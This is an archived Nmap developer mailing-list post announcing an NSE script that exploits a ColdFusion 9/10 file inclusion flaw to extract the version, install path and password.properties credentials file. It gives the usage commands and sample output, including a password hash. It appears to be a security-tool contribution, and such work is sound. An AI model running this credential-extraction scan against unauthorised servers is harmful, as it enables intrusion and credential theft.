Nmap Development mailing list archives
http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10
From: Paulino Calderon Pale <paulino () calderonpale com>
Date: Tue, 07 May 2013 16:38:02 -0500
description = [[Attempts to retrieve the version, installation path and password.properties file in vulnerable ColdFusion 9/10 installations.
This is based on the exploit 'ColdSub-Zero.pyFusion v2'. ]] --- -- @usage nmap -sV --script http-coldfusion-subzero <target>-- @usage nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ <target>
-- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-coldfusion-subzero: -- | absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags -- | version: 9 -- | password_properties: #Fri Mar 02 11:02:01 CST 2012 -- | rdspassword= -- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0 -- |_encrypted=true -- -- @xmloutput-- <script id="http-coldfusion-subzero" output="
 installation_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
 version: 9
 password_properties: #Fri Mar 02 17:03:01 CST 2012
rdspassword=
password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
encrypted=true
"><elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
-- <elem key="version">9</elem>-- <elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012
rdspassword=
password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
encrypted=true
</elem>
-- </script> -- @args http-coldfusion-subzero.basepath Base path. Default: /. -- ---
Attachment:
http-coldfusion-subzero.nse
Description:
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10 Paulino Calderon Pale (May 07)
- Message not available
- Message not available
- Message not available
- Re: http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10 Paulino Calderon Pale (May 09)
- Message not available
- Message not available
- Message not available
- Message not available
- Message not available
- Re: http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10 Paulino Calderon Pale (May 09)
- Message not available